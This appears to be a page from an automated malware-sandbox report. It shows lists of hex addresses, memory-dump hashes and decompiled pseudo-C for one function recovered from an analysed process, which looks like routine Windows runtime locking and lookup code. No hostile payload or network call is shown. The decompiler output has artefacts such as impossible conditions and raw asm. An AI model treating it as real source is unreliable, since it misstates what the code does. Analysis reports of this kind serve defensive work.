                                                                                            0x04cf45ca
                                                                                            0x00000000
                                                                                            0x04cf4247
                                                                                            0x04cf4247
                                                                                            0x04cf4247
                                                                                            0x04cf4249
                                                                                            0x04cf4249
                                                                                            0x04cf4249
                                                                                            0x04cf4251
                                                                                            0x04cf4251
                                                                                            0x04cf4257
                                                                                            0x04cf425f
                                                                                            0x04cf426e
                                                                                            0x04cf4270
                                                                                            0x04cf427a
                                                                                            0x04d3e219
                                                                                            0x04d3e219
                                                                                            0x04cf4280
                                                                                            0x04cf4282
                                                                                            0x04cf4456
                                                                                            0x04cf45ea
                                                                                            0x00000000
                                                                                            0x04cf45f0
                                                                                            0x04d3e223
                                                                                            0x00000000
                                                                                            0x04d3e223
                                                                                            0x04cf445c
                                                                                            0x04cf445c
                                                                                            0x00000000
                                                                                            0x04cf445c
                                                                                            0x00000000
                                                                                            0x04cf4288
                                                                                            0x04cf428c
                                                                                            0x04d3e298
                                                                                            0x04cf4292
                                                                                            0x04cf4292
                                                                                            0x04cf429e
                                                                                            0x04cf42a3
                                                                                            0x04cf42a7
                                                                                            0x04cf42ac
                                                                                            0x04d3e22d
                                                                                            0x04cf42b2
                                                                                            0x04cf42b2
                                                                                            0x04cf42b9
                                                                                            0x04cf42bc
                                                                                            0x04cf42c2
                                                                                            0x04cf42ca
                                                                                            0x04cf42cd
                                                                                            0x04cf42cd
                                                                                            0x04cf42d4
                                                                                            0x04cf433f
                                                                                            0x04cf433f
                                                                                            0x04cf42d6
                                                                                            0x04cf42d6
                                                                                            0x04cf42d9
                                                                                            0x04cf42dd
                                                                                            0x04cf42eb
                                                                                            0x04d3e23a
                                                                                            0x04cf42f1
                                                                                            0x04cf4305
                                                                                            0x04cf430d
                                                                                            0x04cf4315
                                                                                            0x04cf4318
                                                                                            0x04cf431f
                                                                                            0x04cf4322
                                                                                            0x04cf432e
                                                                                            0x04cf433b
                                                                                            0x04cf433b
                                                                                            0x00000000
                                                                                            0x04cf432e
                                                                                            0x04cf42eb
                                                                                            0x04cf434c
                                                                                            0x04cf434e
                                                                                            0x04cf4352
                                                                                            0x04cf4359
                                                                                            0x04cf435e
                                                                                            0x04cf4361
                                                                                            0x04cf436e
                                                                                            0x04cf438a
                                                                                            0x04cf438e
                                                                                            0x04cf4396
                                                                                            0x04cf439e
                                                                                            0x04cf43a1
                                                                                            0x04cf43ad
                                                                                            0x04cf43bb
                                                                                            0x04cf43bb
                                                                                            0x04cf43ad
                                                                                            0x04cf436e
                                                                                            0x04cf43bf
                                                                                            0x04cf43c5
                                                                                            0x04cf4463
                                                                                            0x04cf4463
                                                                                            0x04cf43ce
                                                                                            0x04cf43d5
                                                                                            0x04cf43d9
                                                                                            0x04cf43df
                                                                                            0x04cf4475
                                                                                            0x04cf4479
                                                                                            0x04cf4491
                                                                                            0x04cf4491
                                                                                            0x04cf4479
                                                                                            0x04cf43e5
                                                                                            0x04cf43eb
                                                                                            0x04cf43f4
                                                                                            0x04cf43f6
                                                                                            0x04cf43f9
                                                                                            0x04cf43fc
                                                                                            0x04cf43ff
                                                                                            0x04cf44e8
                                                                                            0x04cf44ed
                                                                                            0x04cf44f3
                                                                                            0x04d3e247
                                                                                            0x00000000
                                                                                            0x04cf44f9
                                                                                            0x04cf4504
                                                                                            0x04cf4508
                                                                                            0x04cf450f
                                                                                            0x04d3e269
                                                                                            0x00000000
                                                                                            0x04cf4515
                                                                                            0x04cf4519
                                                                                            0x04cf4531
                                                                                            0x04cf4534
                                                                                            0x04cf4537
                                                                                            0x04cf453e
                                                                                            0x04cf4541
                                                                                            0x04cf454a
                                                                                            0x04d3e255
                                                                                            0x04d3e255
                                                                                            0x04d3e25b
                                                                                            0x04d3e25e
                                                                                            0x04d3e261
                                                                                            0x04d3e261
                                                                                            0x04cf4555
                                                                                            0x04cf4559
                                                                                            0x04cf455d
                                                                                            0x04d3e26d
                                                                                            0x04d3e270
                                                                                            0x04d3e274
                                                                                            0x04d3e27a
                                                                                            0x04d3e27d
                                                                                            0x04d3e28e
                                                                                            0x04d3e28e
                                                                                            0x04cf4563
                                                                                            0x04cf4563
                                                                                            0x04cf4569
                                                                                            0x04cf4569
                                                                                            0x00000000
                                                                                            0x04cf455d
                                                                                            0x04cf450f
                                                                                            0x00000000
                                                                                            0x04cf44f3
                                                                                            0x04cf43ff
                                                                                            0x04cf4405
                                                                                            0x04cf4405
                                                                                            0x04cf4405
                                                                                            0x04cf42ac
                                                                                            0x04cf428c
                                                                                            0x04cf4282
                                                                                            0x04cf4407
                                                                                            0x04cf440d
                                                                                            0x04d3e2af
                                                                                            0x04d3e2af
                                                                                            0x04cf4413
                                                                                            0x04cf4413
                                                                                            0x00000000
                                                                                            0x04cf41d4
                                                                                            0x00000000
                                                                                            0x04cf41c3
                                                                                            0x04cf41bd
                                                                                            0x04cf4415
                                                                                            0x04cf4415
                                                                                            0x04cf4416
                                                                                            0x04cf4417
                                                                                            0x04cf4429
                                                                                            0x04cf416e
                                                                                            0x04cf416e
                                                                                            0x04cf4175
                                                                                            0x04cf4498
                                                                                            0x04cf449f
                                                                                            0x04d3e12d
                                                                                            0x00000000
                                                                                            0x04d3e133
                                                                                            0x00000000
                                                                                            0x04d3e133
                                                                                            0x04cf44a5
                                                                                            0x04cf44a5
                                                                                            0x04cf44aa
                                                                                            0x00000000
                                                                                            0x04cf44bb
                                                                                            0x04cf44ca
                                                                                            0x04cf44d6
                                                                                            0x04cf44d7
                                                                                            0x04cf44d8
                                                                                            0x04cf44e3
                                                                                            0x04cf44e3
                                                                                            0x04cf44aa
                                                                                            0x04cf417b
                                                                                            0x04cf417b
                                                                                            0x04cf417b
                                                                                            0x00000000
                                                                                            0x04cf417b
                                                                                            0x04cf4175
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f0efe2d124a58872fe71413cf1741000690d8bb2c9d6554241b065937f48e775
                                                                                            • Instruction ID: ab96aa022900117463a660e4f53145386d2d674dffbedf6f2b7612c38886c8ab
                                                                                            • Opcode Fuzzy Hash: f0efe2d124a58872fe71413cf1741000690d8bb2c9d6554241b065937f48e775
                                                                                            • Instruction Fuzzy Hash: B4F191746082118BD768CF59C880A7BB7E2FF98704F14492EF586CB290E738E945DB56
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D020A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 92%
                                                                                            			E04D020A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x4dc8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04D02EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04D02EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E04CD58EC(_t240);
									_t221 =  *0x4dc5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x4dc5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04D14A2C(0x4dc6e40, 0x4d14b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04CF7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x4cb5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E04D0F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E04D0F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04D57016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04CF2400(_t267 + 0x20);
															}
															L04CF2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04D02397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04CF2280(_t134, 0x4dc8608);
									__eflags =  *0x4dc6e48 - _t253; // 0xd0e480
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E04CEFFB0(_t198, _t241, 0x4dc8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x4dc6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x4dc8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04D06B90(_t210,  &_v64);
										_t262 =  *0x4dc8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E04D0E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E04D197C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E04D1006A(0x4dc8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x4dc8608);
												E04D1B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x4dc6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x4dc6e48; // 0xd0e480
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E04CEFFB0(_t198, _t240, 0x4dc8608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E04D100C2(0x4dc8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x8
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                            0x04d020a0
                                                                                            0x04d020a8
                                                                                            0x04d020ad
                                                                                            0x04d020b3
                                                                                            0x04d020b8
                                                                                            0x04d020c2
                                                                                            0x04d020c7
                                                                                            0x04d020cb
                                                                                            0x04d020d2
                                                                                            0x04d02263
                                                                                            0x04d02266
                                                                                            0x04d45836
                                                                                            0x04d45836
                                                                                            0x00000000
                                                                                            0x04d0226c
                                                                                            0x04d0226c
                                                                                            0x04d02270
                                                                                            0x04d02274
                                                                                            0x04d020e2
                                                                                            0x04d020e2
                                                                                            0x04d020e6
                                                                                            0x04d020ee
                                                                                            0x04d457dc
                                                                                            0x04d457de
                                                                                            0x04d457ec
                                                                                            0x04d457ec
                                                                                            0x04d457f1
                                                                                            0x04d457f3
                                                                                            0x04d457f8
                                                                                            0x00000000
                                                                                            0x04d457f8
                                                                                            0x04d457e0
                                                                                            0x04d457e4
                                                                                            0x04d457ea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d457ea
                                                                                            0x04d020f4
                                                                                            0x04d020f4
                                                                                            0x04d020f8
                                                                                            0x04d020f8
                                                                                            0x04d020fc
                                                                                            0x04d02100
                                                                                            0x04d02106
                                                                                            0x04d02201
                                                                                            0x04d02206
                                                                                            0x04d0220b
                                                                                            0x04d0220e
                                                                                            0x04d022a9
                                                                                            0x04d022ac
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d022b2
                                                                                            0x04d022b5
                                                                                            0x04d45801
                                                                                            0x04d45806
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d45810
                                                                                            0x04d45815
                                                                                            0x04d45818
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d4581e
                                                                                            0x04d022bb
                                                                                            0x04d022bb
                                                                                            0x04d02218
                                                                                            0x04d02218
                                                                                            0x04d0221c
                                                                                            0x04d02220
                                                                                            0x04d02222
                                                                                            0x04d022c2
                                                                                            0x04d022c4
                                                                                            0x04d022dc
                                                                                            0x04d022dc
                                                                                            0x04d022e1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d022e7
                                                                                            0x04d022c8
                                                                                            0x04d022cd
                                                                                            0x04d022d3
                                                                                            0x04d022d6
                                                                                            0x04d45823
                                                                                            0x04d45825
                                                                                            0x04d45827
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d4582d
                                                                                            0x00000000
                                                                                            0x04d4582d
                                                                                            0x00000000
                                                                                            0x04d02228
                                                                                            0x04d02228
                                                                                            0x00000000
                                                                                            0x04d02228
                                                                                            0x04d02222
                                                                                            0x04d02214
                                                                                            0x04d02214
                                                                                            0x00000000
                                                                                            0x04d02114
                                                                                            0x04d02114
                                                                                            0x04d02114
                                                                                            0x04d0211a
                                                                                            0x04d0211c
                                                                                            0x04d02348
                                                                                            0x04d0234d
                                                                                            0x04d45840
                                                                                            0x04d45845
                                                                                            0x04d45848
                                                                                            0x04d4584e
                                                                                            0x04d4584e
                                                                                            0x04d45848
                                                                                            0x04d02353
                                                                                            0x04d02355
                                                                                            0x04d02388
                                                                                            0x04d02388
                                                                                            0x04d02368
                                                                                            0x04d0236a
                                                                                            0x04d0236c
                                                                                            0x04d0238f
                                                                                            0x00000000
                                                                                            0x04d0236e
                                                                                            0x04d0236e
                                                                                            0x04d0218e
                                                                                            0x04d0218e
                                                                                            0x04d02191
                                                                                            0x04d02195
                                                                                            0x04d45a03
                                                                                            0x04d45a06
                                                                                            0x04d45a0c
                                                                                            0x04d45a0f
                                                                                            0x04d45a11
                                                                                            0x04d45a13
                                                                                            0x04d45a13
                                                                                            0x04d45a19
                                                                                            0x04d45a1f
                                                                                            0x00000000
                                                                                            0x04d0219b
                                                                                            0x04d0219b
                                                                                            0x04d021a0
                                                                                            0x04d02282
                                                                                            0x04d02284
                                                                                            0x04d02284
                                                                                            0x04d02284
                                                                                            0x04d02284
                                                                                            0x04d021a6
                                                                                            0x04d021a9
                                                                                            0x04d021ac
                                                                                            0x04d021ae
                                                                                            0x04d021b3
                                                                                            0x04d0228b
                                                                                            0x04d02290
                                                                                            0x04d02379
                                                                                            0x04d02296
                                                                                            0x04d02298
                                                                                            0x04d02298
                                                                                            0x04d02290
                                                                                            0x04d021b9
                                                                                            0x04d021be
                                                                                            0x04d022a2
                                                                                            0x04d022a2
                                                                                            0x04d021c4
                                                                                            0x04d021c8
                                                                                            0x04d021cc
                                                                                            0x04d021d0
                                                                                            0x04d021d4
                                                                                            0x04d021de
                                                                                            0x04d021e3
                                                                                            0x04d45a29
                                                                                            0x04d45a2c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d45a3b
                                                                                            0x00000000
                                                                                            0x04d021e9
                                                                                            0x04d021e9
                                                                                            0x04d021e9
                                                                                            0x04d021ee
                                                                                            0x04d021f1
                                                                                            0x04d45a45
                                                                                            0x04d45a4b
                                                                                            0x04d45a52
                                                                                            0x04d45a58
                                                                                            0x04d45a5d
                                                                                            0x04d45a5f
                                                                                            0x04d45a71
                                                                                            0x04d45a61
                                                                                            0x04d45a6a
                                                                                            0x04d45a6a
                                                                                            0x04d45a76
                                                                                            0x04d45a79
                                                                                            0x04d45a7f
                                                                                            0x04d45a83
                                                                                            0x04d45a85
                                                                                            0x04d45a87
                                                                                            0x04d45a87
                                                                                            0x04d45a8c
                                                                                            0x04d45a91
                                                                                            0x04d45a97
                                                                                            0x04d45a9f
                                                                                            0x04d45aa0
                                                                                            0x04d45aa1
                                                                                            0x04d45aa6
                                                                                            0x04d45aab
                                                                                            0x04d45ab1
                                                                                            0x04d45ab3
                                                                                            0x04d45ab9
                                                                                            0x04d45aca
                                                                                            0x04d45ad4
                                                                                            0x04d45ad4
                                                                                            0x04d45ade
                                                                                            0x04d45ade
                                                                                            0x04d45aab
                                                                                            0x04d45a79
                                                                                            0x04d45a52
                                                                                            0x04d021f7
                                                                                            0x04d021f9
                                                                                            0x04d021fe
                                                                                            0x04d021fe
                                                                                            0x04d021e3
                                                                                            0x04d02195
                                                                                            0x04d0236c
                                                                                            0x04d02122
                                                                                            0x04d02122
                                                                                            0x04d02124
                                                                                            0x04d02231
                                                                                            0x04d02236
                                                                                            0x04d02236
                                                                                            0x04d02238
                                                                                            0x04d02238
                                                                                            0x04d02240
                                                                                            0x04d02242
                                                                                            0x04d02244
                                                                                            0x04d459fc
                                                                                            0x04d0218c
                                                                                            0x04d0218c
                                                                                            0x00000000
                                                                                            0x04d0218c
                                                                                            0x04d0224a
                                                                                            0x04d0224f
                                                                                            0x04d02256
                                                                                            0x04d02304
                                                                                            0x04d02309
                                                                                            0x04d0230f
                                                                                            0x04d0231e
                                                                                            0x04d0231e
                                                                                            0x04d0231e
                                                                                            0x04d02320
                                                                                            0x04d02325
                                                                                            0x04d0232a
                                                                                            0x04d0232c
                                                                                            0x04d0233e
                                                                                            0x04d0233e
                                                                                            0x00000000
                                                                                            0x04d0232c
                                                                                            0x04d02311
                                                                                            0x04d02317
                                                                                            0x04d0231a
                                                                                            0x04d0231c
                                                                                            0x04d02380
                                                                                            0x04d02380
                                                                                            0x04d02380
                                                                                            0x04d02384
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02386
                                                                                            0x00000000
                                                                                            0x04d0231c
                                                                                            0x04d0225c
                                                                                            0x04d0225c
                                                                                            0x00000000
                                                                                            0x04d0225c
                                                                                            0x04d0212a
                                                                                            0x04d02134
                                                                                            0x04d02138
                                                                                            0x04d0213d
                                                                                            0x04d45858
                                                                                            0x04d45863
                                                                                            0x04d45863
                                                                                            0x04d45867
                                                                                            0x04d4586a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d4586c
                                                                                            0x04d4586c
                                                                                            0x04d45871
                                                                                            0x04d45875
                                                                                            0x04d45877
                                                                                            0x04d45997
                                                                                            0x04d4599c
                                                                                            0x04d459a1
                                                                                            0x04d459a7
                                                                                            0x04d459a7
                                                                                            0x00000000
                                                                                            0x04d459a7
                                                                                            0x04d4587d
                                                                                            0x00000000
                                                                                            0x04d4588b
                                                                                            0x04d4588b
                                                                                            0x04d45890
                                                                                            0x04d45892
                                                                                            0x04d45894
                                                                                            0x04d45899
                                                                                            0x04d4589b
                                                                                            0x04d458a0
                                                                                            0x04d458a0
                                                                                            0x04d458aa
                                                                                            0x04d458b2
                                                                                            0x04d458b6
                                                                                            0x04d458be
                                                                                            0x04d458c6
                                                                                            0x04d458c9
                                                                                            0x04d4590d
                                                                                            0x04d45917
                                                                                            0x04d4591a
                                                                                            0x04d4591c
                                                                                            0x04d45920
                                                                                            0x04d45928
                                                                                            0x04d4592a
                                                                                            0x04d4592c
                                                                                            0x04d4592e
                                                                                            0x04d4592e
                                                                                            0x04d458cb
                                                                                            0x04d458cd
                                                                                            0x04d458d8
                                                                                            0x04d458e0
                                                                                            0x04d458f4
                                                                                            0x04d458fe
                                                                                            0x04d458fe
                                                                                            0x04d4593a
                                                                                            0x04d4593e
                                                                                            0x04d45940
                                                                                            0x04d45942
                                                                                            0x00000000
                                                                                            0x04d45944
                                                                                            0x04d45944
                                                                                            0x04d45949
                                                                                            0x04d4594e
                                                                                            0x04d4594e
                                                                                            0x04d45953
                                                                                            0x04d4595b
                                                                                            0x04d45976
                                                                                            0x04d45976
                                                                                            0x04d4597a
                                                                                            0x04d4597f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d45981
                                                                                            0x04d45981
                                                                                            0x04d45981
                                                                                            0x04d45983
                                                                                            0x04d45988
                                                                                            0x04d4598d
                                                                                            0x04d45991
                                                                                            0x04d45991
                                                                                            0x00000000
                                                                                            0x04d4595d
                                                                                            0x04d4595d
                                                                                            0x04d45963
                                                                                            0x04d45965
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d45967
                                                                                            0x04d45967
                                                                                            0x04d4596b
                                                                                            0x04d4596d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d4596f
                                                                                            0x04d45971
                                                                                            0x04d45971
                                                                                            0x04d45974
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d45974
                                                                                            0x00000000
                                                                                            0x04d45967
                                                                                            0x04d4595b
                                                                                            0x04d45942
                                                                                            0x04d45863
                                                                                            0x04d02143
                                                                                            0x04d02143
                                                                                            0x04d02149
                                                                                            0x04d0214f
                                                                                            0x04d022ec
                                                                                            0x04d022f1
                                                                                            0x04d022f6
                                                                                            0x00000000
                                                                                            0x04d022f6
                                                                                            0x04d02159
                                                                                            0x04d02173
                                                                                            0x04d02173
                                                                                            0x04d0217d
                                                                                            0x04d02181
